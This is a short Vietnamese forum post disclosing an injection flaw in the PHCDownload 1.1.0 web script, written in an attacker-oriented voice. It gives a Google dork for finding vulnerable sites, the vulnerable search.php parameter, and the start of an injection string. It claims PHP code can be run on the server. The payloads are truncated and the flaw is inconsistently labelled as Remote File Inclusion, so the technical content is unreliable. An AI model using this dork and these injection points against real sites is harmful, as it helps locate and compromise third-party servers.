PHCDownload 1.1.0 by H2P

hack2prison — GMT

Mô tả: - Script: PHCDownload là mã nguồn ứng dụng web dùng để quản lý upload/download rất hay nhưng điểm yếu muôn thuở của các code cho phép upload là tạo điều kiện cho attacker cài ám khí lên server. - Vendor: http://phpcredo.com - Menthod: Remote File Inclusion. - Infect: search, addfile và add comment function. - Version: v1.1.0 and older - Reported: H2P Khai thác: - Google dork: Powered by PHCDownload 1.1.0 - http://[insecure_site]/[path]/search.php Search Words: ">< Submit và xem điều kỳ diệu. Note: Tương tự đối với chức năng add file và post comment Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP.

Latest posts for the topic "PHCDownload 1.1.0 by H2P"

PHCDownload 1.1.0 by H2P